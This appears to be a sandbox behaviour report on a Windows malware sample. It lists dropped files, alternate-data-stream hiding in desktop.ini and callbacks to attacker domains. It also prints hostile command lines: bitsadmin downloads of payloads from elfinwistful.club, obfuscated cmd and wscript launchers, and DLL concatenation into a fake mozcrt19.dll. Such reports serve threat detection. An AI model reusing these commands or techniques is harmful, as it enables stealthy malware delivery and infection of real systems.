Technical Information
- '%WINDIR%\explorer.exe' /c, C:\Users\Public\Pictures\cmxvrh4.js
- C:\users\public\pictures\cmxvrh4.js
- C:\users\public\libraries\qlanl\bit8161.tmp
- C:\users\public\libraries\qlanl\desktop.ini:balberithxc.~
- C:\users\public\libraries\qlanl\bit75e6.tmp
- C:\users\public\libraries\qlanl\desktop.ini:balberithxb.~
- C:\users\public\libraries\qlanl\bit67db.tmp
- C:\users\public\libraries\qlanl\desktop.ini:balberithxa.~
- C:\users\public\libraries\qlanl\bit4bb7.tmp
- C:\users\public\libraries\qlanl\desktop.ini:balberithi.gif
- C:\users\public\libraries\qlanl\bit3540.tmp
- C:\users\public\libraries\qlanl\desktop.ini:balberithgx.gif
- C:\users\public\libraries\qlanl\bit262c.tmp
- C:\users\public\libraries\qlanl\bit95f3.tmp
- C:\users\public\libraries\qlanl\desktop.ini:balberithg.gif
- C:\users\public\libraries\qlanl\desktop.ini:balberithdx.gif
- C:\users\public\libraries\qlanl\bit91.tmp
- C:\users\public\libraries\qlanl\desktop.ini:balberithdwwn.gif
- C:\users\public\libraries\qlanl\bitecc9.tmp
- C:\users\public\libraries\qlanl\desktop.ini:balberithc.jpg
- C:\users\public\libraries\qlanl\bitdeee.tmp
- C:\users\public\libraries\qlanl\desktop.ini:balberithb.jpg
- C:\users\public\libraries\qlanl\bitc51b.tmp
- C:\users\public\libraries\qlanl\desktop.ini:balberitha.jpg
- C:\users\public\libraries\qlanl\bitb480.tmp
- %LOCALAPPDATA%\microsoft\windows\inetcookies\jeile8wl.txt
- C:\users\public\libraries\qlanl\bit13bc.tmp
- C:\users\public\libraries\qlanl\mozcrt19.dll
- C:\users\public\libraries\qlanl\bitb480.tmp
- C:\users\public\libraries\qlanl\bitc51b.tmp
- C:\users\public\libraries\qlanl\bitdeee.tmp
- C:\users\public\libraries\qlanl\bitecc9.tmp
- C:\users\public\libraries\qlanl\bit91.tmp
- C:\users\public\libraries\qlanl\bit13bc.tmp
- C:\users\public\libraries\qlanl\bit262c.tmp
- C:\users\public\libraries\qlanl\bit3540.tmp
- C:\users\public\libraries\qlanl\bit4bb7.tmp
- C:\users\public\libraries\qlanl\bit67db.tmp
- C:\users\public\libraries\qlanl\bit75e6.tmp
- C:\users\public\libraries\qlanl\bit8161.tmp
- C:\users\public\libraries\qlanl\bit95f3.tmp
- from C:\users\public\libraries\qlanl\bitb480.tmp to C:\users\public\libraries\qlanl\balberitha.jpg
- from C:\users\public\libraries\qlanl\bitc51b.tmp to C:\users\public\libraries\qlanl\balberithb.jpg
- from C:\users\public\libraries\qlanl\bitdeee.tmp to C:\users\public\libraries\qlanl\balberithc.jpg
- from C:\users\public\libraries\qlanl\bitecc9.tmp to C:\users\public\libraries\qlanl\balberithdwwn.gif
- from C:\users\public\libraries\qlanl\bit91.tmp to C:\users\public\libraries\qlanl\balberithdx.gif
- from C:\users\public\libraries\qlanl\bit13bc.tmp to C:\users\public\libraries\qlanl\balberithg.gif
- from C:\users\public\libraries\qlanl\bit262c.tmp to C:\users\public\libraries\qlanl\balberithgx.gif
- from C:\users\public\libraries\qlanl\bit3540.tmp to C:\users\public\libraries\qlanl\balberithi.gif
- from C:\users\public\libraries\qlanl\bit4bb7.tmp to C:\users\public\libraries\qlanl\balberithxa.~
- from C:\users\public\libraries\qlanl\bit67db.tmp to C:\users\public\libraries\qlanl\balberithxb.~
- from C:\users\public\libraries\qlanl\bit75e6.tmp to C:\users\public\libraries\qlanl\balberithxc.~
- from C:\users\public\libraries\qlanl\bit8161.tmp to C:\users\public\libraries\qlanl\balberith64a.dll
- from C:\users\public\libraries\qlanl\bit95f3.tmp to C:\users\public\libraries\qlanl\balberith64b.dll
- 'n7#######c9.osieofcorizon.fun':443
- '39#######1s.elfinwistful.club':443
- '<SYSTEM32>\wscript.exe' "C:\Users\Public\Pictures\cmxvrh4.js"
- '<SYSTEM32>\bitsadmin.exe' /transfer 12241 /priority foreground https://39xkdrnei1s.elfinwistful.club/09/balberithhh76b.dll.zip C:\Users\Public\Libraries\qlanl\balberith64b.dll' (with hidden window)
- '<SYSTEM32>\bitsadmin.exe' /transfer 11583 /priority foreground https://39xkdrnei1s.elfinwistful.club/09/balberithhh76a.dll.zip C:\Users\Public\Libraries\qlanl\balberith64a.dll' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c type "C:\Users\Public\Libraries\qlanl\balberithxc.~" > "C:\Users\Public\Libraries\qlanl\desktop.ini:balberithxc.~"&&erase "C:\Users\Public\Libraries\qlanl\balberithxc.~"' (with hidden window)
- '<SYSTEM32>\bitsadmin.exe' /transfer 83640 /priority foreground https://39xkdrnei1s.elfinwistful.club/09/balberithxc.gif.zip C:\Users\Public\Libraries\qlanl\balberithxc.~' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c type "C:\Users\Public\Libraries\qlanl\balberithxb.~" > "C:\Users\Public\Libraries\qlanl\desktop.ini:balberithxb.~"&&erase "C:\Users\Public\Libraries\qlanl\balberithxb.~"' (with hidden window)
- '<SYSTEM32>\bitsadmin.exe' /transfer 73181 /priority foreground https://39xkdrnei1s.elfinwistful.club/09/balberithxb.gif.zip C:\Users\Public\Libraries\qlanl\balberithxb.~' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c type "C:\Users\Public\Libraries\qlanl\balberithxa.~" > "C:\Users\Public\Libraries\qlanl\desktop.ini:balberithxa.~"&&erase "C:\Users\Public\Libraries\qlanl\balberithxa.~"' (with hidden window)
- '<SYSTEM32>\bitsadmin.exe' /transfer 46672 /priority foreground https://39xkdrnei1s.elfinwistful.club/09/balberithxa.gif.zip C:\Users\Public\Libraries\qlanl\balberithxa.~' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c type "C:\Users\Public\Libraries\qlanl\balberithi.gif" > "C:\Users\Public\Libraries\qlanl\desktop.ini:balberithi.gif"&&erase "C:\Users\Public\Libraries\qlanl\balberithi.gif"' (with hidden window)
- '<SYSTEM32>\bitsadmin.exe' /transfer 25668 /priority foreground https://39xkdrnei1s.elfinwistful.club/09/balberithi.gif.zip C:\Users\Public\Libraries\qlanl\balberithi.gif' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c type "C:\Users\Public\Libraries\qlanl\balberithgx.gif" > "C:\Users\Public\Libraries\qlanl\desktop.ini:balberithgx.gif"&&erase "C:\Users\Public\Libraries\qlanl\balberithgx.gif"' (with hidden window)
- '<SYSTEM32>\bitsadmin.exe' /transfer 51051 /priority foreground https://39xkdrnei1s.elfinwistful.club/09/balberithgx.gif.zip C:\Users\Public\Libraries\qlanl\balberithgx.gif' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c type "C:\Users\Public\Libraries\qlanl\balberithg.gif" > "C:\Users\Public\Libraries\qlanl\desktop.ini:balberithg.gif"&&erase "C:\Users\Public\Libraries\qlanl\balberithg.gif"' (with hidden window)
- '<SYSTEM32>\bitsadmin.exe' /transfer 22247 /priority foreground https://39xkdrnei1s.elfinwistful.club/09/balberithg.gif.zip C:\Users\Public\Libraries\qlanl\balberithg.gif' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c type "C:\Users\Public\Libraries\qlanl\balberithdx.gif" > "C:\Users\Public\Libraries\qlanl\desktop.ini:balberithdx.gif"&&erase "C:\Users\Public\Libraries\qlanl\balberithdx.gif"' (with hidden window)
- '<SYSTEM32>\bitsadmin.exe' /transfer 19902 /priority foreground https://39xkdrnei1s.elfinwistful.club/09/balberithdx.gif.zip C:\Users\Public\Libraries\qlanl\balberithdx.gif' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c type "C:\Users\Public\Libraries\qlanl\balberithdwwn.gif" > "C:\Users\Public\Libraries\qlanl\desktop.ini:balberithdwwn.gif"&&erase "C:\Users\Public\Libraries\qlanl\balberithdwwn.gif"' (with hidden window)
- '<SYSTEM32>\bitsadmin.exe' /transfer 92210 /priority foreground https://39xkdrnei1s.elfinwistful.club/09/balberithdwwn.gif.zip C:\Users\Public\Libraries\qlanl\balberithdwwn.gif' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c type "C:\Users\Public\Libraries\qlanl\balberithc.jpg" > "C:\Users\Public\Libraries\qlanl\desktop.ini:balberithc.jpg"&&erase "C:\Users\Public\Libraries\qlanl\balberithc.jpg"' (with hidden window)
- '<SYSTEM32>\bitsadmin.exe' /transfer 40232 /priority foreground https://39xkdrnei1s.elfinwistful.club/09/balberithc.jpg.zip C:\Users\Public\Libraries\qlanl\balberithc.jpg' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c type "C:\Users\Public\Libraries\qlanl\balberithb.jpg" > "C:\Users\Public\Libraries\qlanl\desktop.ini:balberithb.jpg"&&erase "C:\Users\Public\Libraries\qlanl\balberithb.jpg"' (with hidden window)
- '<SYSTEM32>\bitsadmin.exe' /transfer 41991 /priority foreground https://39xkdrnei1s.elfinwistful.club/09/balberithb.jpg.zip C:\Users\Public\Libraries\qlanl\balberithb.jpg' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c type "C:\Users\Public\Libraries\qlanl\balberitha.jpg" > "C:\Users\Public\Libraries\qlanl\desktop.ini:balberitha.jpg"&&erase "C:\Users\Public\Libraries\qlanl\balberitha.jpg"' (with hidden window)
- '<SYSTEM32>\bitsadmin.exe' /transfer 49920 /priority foreground https://39xkdrnei1s.elfinwistful.club/09/balberitha.jpg.zip C:\Users\Public\Libraries\qlanl\balberitha.jpg' (with hidden window)
- '<SYSTEM32>\wscript.exe' "C:\Users\Public\Pictures\cmxvrh4.js"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /V /C "echo xXx>C:\Users\Public\Libraries\qlanl\r1.log"&& exit' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c cd "C:\Users\Public\Libraries\qlanl" && type balberith64a.dll balberith64b.dll > mozcrt19.dll' (with hidden window)
- '<SYSTEM32>\cmd.exe' /S /D /c" sET/p bxzvmje="%BQQ:IXXEDG=%%et986aW:1YYKL=/%" 0<NUL 1>C:\Users\Public\Pictures\cmxvrh4.js"
- '<SYSTEM32>\bitsadmin.exe' /transfer 12241 /priority foreground https://39xkdrnei1s.elfinwistful.club/09/balberithhh76b.dll.zip C:\Users\Public\Libraries\qlanl\balberith64b.dll
- '<SYSTEM32>\bitsadmin.exe' /transfer 11583 /priority foreground https://39xkdrnei1s.elfinwistful.club/09/balberithhh76a.dll.zip C:\Users\Public\Libraries\qlanl\balberith64a.dll
- '<SYSTEM32>\cmd.exe' /c type "C:\Users\Public\Libraries\qlanl\balberithxc.~" > "C:\Users\Public\Libraries\qlanl\desktop.ini:balberithxc.~"&&erase "C:\Users\Public\Libraries\qlanl\balberithxc.~"
- '<SYSTEM32>\bitsadmin.exe' /transfer 83640 /priority foreground https://39xkdrnei1s.elfinwistful.club/09/balberithxc.gif.zip C:\Users\Public\Libraries\qlanl\balberithxc.~
- '<SYSTEM32>\cmd.exe' /c type "C:\Users\Public\Libraries\qlanl\balberithxb.~" > "C:\Users\Public\Libraries\qlanl\desktop.ini:balberithxb.~"&&erase "C:\Users\Public\Libraries\qlanl\balberithxb.~"
- '<SYSTEM32>\bitsadmin.exe' /transfer 73181 /priority foreground https://39xkdrnei1s.elfinwistful.club/09/balberithxb.gif.zip C:\Users\Public\Libraries\qlanl\balberithxb.~
- '<SYSTEM32>\cmd.exe' /c type "C:\Users\Public\Libraries\qlanl\balberithxa.~" > "C:\Users\Public\Libraries\qlanl\desktop.ini:balberithxa.~"&&erase "C:\Users\Public\Libraries\qlanl\balberithxa.~"
- '<SYSTEM32>\bitsadmin.exe' /transfer 46672 /priority foreground https://39xkdrnei1s.elfinwistful.club/09/balberithxa.gif.zip C:\Users\Public\Libraries\qlanl\balberithxa.~
- '<SYSTEM32>\cmd.exe' /c type "C:\Users\Public\Libraries\qlanl\balberithi.gif" > "C:\Users\Public\Libraries\qlanl\desktop.ini:balberithi.gif"&&erase "C:\Users\Public\Libraries\qlanl\balberithi.gif"
- '<SYSTEM32>\bitsadmin.exe' /transfer 25668 /priority foreground https://39xkdrnei1s.elfinwistful.club/09/balberithi.gif.zip C:\Users\Public\Libraries\qlanl\balberithi.gif
- '<SYSTEM32>\cmd.exe' /c type "C:\Users\Public\Libraries\qlanl\balberithgx.gif" > "C:\Users\Public\Libraries\qlanl\desktop.ini:balberithgx.gif"&&erase "C:\Users\Public\Libraries\qlanl\balberithgx.gif"
- '<SYSTEM32>\bitsadmin.exe' /transfer 51051 /priority foreground https://39xkdrnei1s.elfinwistful.club/09/balberithgx.gif.zip C:\Users\Public\Libraries\qlanl\balberithgx.gif
- '<SYSTEM32>\cmd.exe' /c type "C:\Users\Public\Libraries\qlanl\balberithg.gif" > "C:\Users\Public\Libraries\qlanl\desktop.ini:balberithg.gif"&&erase "C:\Users\Public\Libraries\qlanl\balberithg.gif"
- '<SYSTEM32>\bitsadmin.exe' /transfer 22247 /priority foreground https://39xkdrnei1s.elfinwistful.club/09/balberithg.gif.zip C:\Users\Public\Libraries\qlanl\balberithg.gif
- '<SYSTEM32>\cmd.exe' /c type "C:\Users\Public\Libraries\qlanl\balberithdx.gif" > "C:\Users\Public\Libraries\qlanl\desktop.ini:balberithdx.gif"&&erase "C:\Users\Public\Libraries\qlanl\balberithdx.gif"
- '<SYSTEM32>\bitsadmin.exe' /transfer 19902 /priority foreground https://39xkdrnei1s.elfinwistful.club/09/balberithdx.gif.zip C:\Users\Public\Libraries\qlanl\balberithdx.gif
- '<SYSTEM32>\cmd.exe' /c type "C:\Users\Public\Libraries\qlanl\balberithdwwn.gif" > "C:\Users\Public\Libraries\qlanl\desktop.ini:balberithdwwn.gif"&&erase "C:\Users\Public\Libraries\qlanl\balberithdwwn.gif"
- '<SYSTEM32>\bitsadmin.exe' /transfer 92210 /priority foreground https://39xkdrnei1s.elfinwistful.club/09/balberithdwwn.gif.zip C:\Users\Public\Libraries\qlanl\balberithdwwn.gif
- '<SYSTEM32>\cmd.exe' /c type "C:\Users\Public\Libraries\qlanl\balberithc.jpg" > "C:\Users\Public\Libraries\qlanl\desktop.ini:balberithc.jpg"&&erase "C:\Users\Public\Libraries\qlanl\balberithc.jpg"
- '<SYSTEM32>\bitsadmin.exe' /transfer 40232 /priority foreground https://39xkdrnei1s.elfinwistful.club/09/balberithc.jpg.zip C:\Users\Public\Libraries\qlanl\balberithc.jpg
- '<SYSTEM32>\cmd.exe' /c type "C:\Users\Public\Libraries\qlanl\balberithb.jpg" > "C:\Users\Public\Libraries\qlanl\desktop.ini:balberithb.jpg"&&erase "C:\Users\Public\Libraries\qlanl\balberithb.jpg"
- '<SYSTEM32>\bitsadmin.exe' /transfer 41991 /priority foreground https://39xkdrnei1s.elfinwistful.club/09/balberithb.jpg.zip C:\Users\Public\Libraries\qlanl\balberithb.jpg
- '<SYSTEM32>\cmd.exe' /c type "C:\Users\Public\Libraries\qlanl\balberitha.jpg" > "C:\Users\Public\Libraries\qlanl\desktop.ini:balberitha.jpg"&&erase "C:\Users\Public\Libraries\qlanl\balberitha.jpg"
- '<SYSTEM32>\bitsadmin.exe' /transfer 49920 /priority foreground https://39xkdrnei1s.elfinwistful.club/09/balberitha.jpg.zip C:\Users\Public\Libraries\qlanl\balberitha.jpg
- '<SYSTEM32>\cmd.exe' /S /D /c" exit"
- '<SYSTEM32>\cmd.exe' /S /D /c" CAll %XTG:MMBQX=% C:\Users\Public\Pictures\cmxvrh4.js"
- '<SYSTEM32>\cmd.exe' /S /D /c" md \ |"
- '<SYSTEM32>\cmd.exe' /V /C "echo xXx>C:\Users\Public\Libraries\qlanl\r1.log"&& exit
- '<SYSTEM32>\cmd.exe' /c cd "C:\Users\Public\Libraries\qlanl" && type balberith64a.dll balberith64b.dll > mozcrt19.dll